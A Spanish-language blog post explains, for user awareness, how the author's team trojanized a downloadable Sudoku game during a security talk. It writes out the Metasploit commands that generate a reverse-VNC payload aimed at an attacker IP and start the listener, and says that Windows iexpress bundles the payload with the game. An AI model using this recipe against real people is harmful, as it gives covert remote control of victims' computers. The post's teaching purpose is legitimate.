Autor: Matias Soler
Fuente: http://gnuler.blogspot.com/
Enlace: http://gnuler.blogspot.com/2009/06/troyanizando-en-5.htmlContenido:
Uno de los temas charlados durante las jornadas que dicté con Silvia y Gustavo hace dos semanas, fue la responsabilidad del usuario al momento de usar su PC. Con esto de responsabilidad nos referíamos a que no se puede delegar toda la responsabilidad o la decisión de qué es benébolo y que no en un antivirus, sino que es el usuario el que tiene que aportar su lado humano y discernir a la hora de, por ejemplo, bajar un software de Internet de un lugar de confianza.
Muchas veces la gente no es realmente consciente de qué tan malo puede ser un troyano, suena demasiado a ciencia ficción quizás. Es por esto que hicimos una pequeña demostración donde nos bajabamos a nuestra laptop un Sudoku de un sitio de internet dedicado a descargas.
La particularidad era que este soft estaba alterado por nosotros, y al ejecutarse y luego cerrarse se lanzaba una conexión VNC reversa contra la máquina del atacante. Pero mientras tanto era idéntico al software real.
Lamentablemente no tuvimos tiempo suficiente para mostrar qué tan simple fue para nosotros troyanizar este soft, por lo que se los cuento por acá:
Ensuciandonos las manos
El primer paso fue bajar una versión del sudoku que sea un exe standalone, muy fácil buscando un poco por google.
Luego usamos metasploit para generar el payload del vnc reverso, para eso hicimos algo así:
msfpayload windows/vncinject/reverse_tcp LHOST=IP_ATACANTE LPORT=3333 X > reverse-vnc.exe
Y por último nos falta juntar ambas piezas, para no complicarnos usamos una herramienta que es parte de Windows, iexpress.
Del lado del atacante esperamos pacientes con metasploit escuchando:
msfcli exploit/multi/handler PAYLOAD=windows/vncinject/reverse_tcp LPORT=3333 LHOST=172.15.0.10 DisableCourtesyShell=TRUE E
Y esto es todo! Una vez que el usuario ejecute nuestro exe empaquetado, se lanzará también el payload del reverse VNC y nos abrirá una bonita ventana desde la cuál podremos controlar a la vícima.
Espero que sirva para que aquellos no tan cercanos al mundo de la Seguridad Informática se den una idea de "que tan fácil" es, y piensen dos veces antes de bajar algún soft desde rapidshare, megaupload, etc.
No comments:
Post a Comment